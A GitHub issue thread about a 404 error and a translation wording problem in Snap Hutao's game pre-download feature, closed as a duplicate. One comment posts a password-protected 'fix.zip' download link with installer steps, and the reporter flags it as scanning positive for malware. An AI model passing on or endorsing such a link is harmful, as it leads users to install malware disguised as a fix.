### ISSUE TITLE
[Bug]: 预下载404

### ISSUE THREAD

**Issue by twjmy** [DGP-Studio/Snap.Hutao#1931]
### 检查清单

- [X] 我已阅读 Snap Hutao 文档中的[常见问题](https://hut.ao/advanced/FAQ.html)和[常见程序异常](https://hut.ao/advanced/exceptions.html)，我的问题没有在文档中得到解答
- [X] 我知道[文档站](https://hut.ao/zh/menu.html)的导航栏中有**搜索功能**，且已经搜索过相关关键词
- [X] 我的问题不是[已完成](https://github.com/DGP-Studio/Snap.Hutao/issues?q=is%3Aopen+is%3Aissue+label%3A%E5%B7%B2%E5%AE%8C%E6%88%90)的问题也不是一个别人已发布的**重复的**问题

### Windows 版本

22631.4037

### Snap Hutao 版本

1.11.0.0

### 设备 ID

4B6379FDA25D058C3FA50872BAB7D316

### 问题分类

游戏启动器

### 发生了什么？

![image](https://github.com/user-attachments/assets/5663bf69-0693-442e-8c65-01931a0cc53b)
此外｢预下载｣对应在地化语言应为｢預先下載｣
![image](https://github.com/user-attachments/assets/37fc84d5-93b5-4e09-9cec-baacb147b248)

### 你期望发生的行为？

即便是测试功能，亦希望以上讯息能提供帮助，使得开发人员完善预先下载功能

### 最后一步

- [X] 我认为上述的描述已经足以详细，以允许开发人员能复现该问题

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by twjmy** [comment]
@Masterain98 @Lightczx 请管理员屏蔽上面这条评论，档案扫出来有毒

> Download - password: changeme In the installer menu, select "gcc."

**Comment by SSB-ARFCN** [comment]
#1903 
估計還沒套用

**Comment by twjmy** [comment]
> #1903 估計還沒套用

资源不一样，tag指的是游戏本体与修复，本串指的是预载资源

**Comment by Lightczx** [comment]
翻译问题自行修改crowdin即可
Duplicate of #1903

**Comment by SSB-ARFCN** [comment]
5.0即將更新 也許很快就會有大量的使用需求
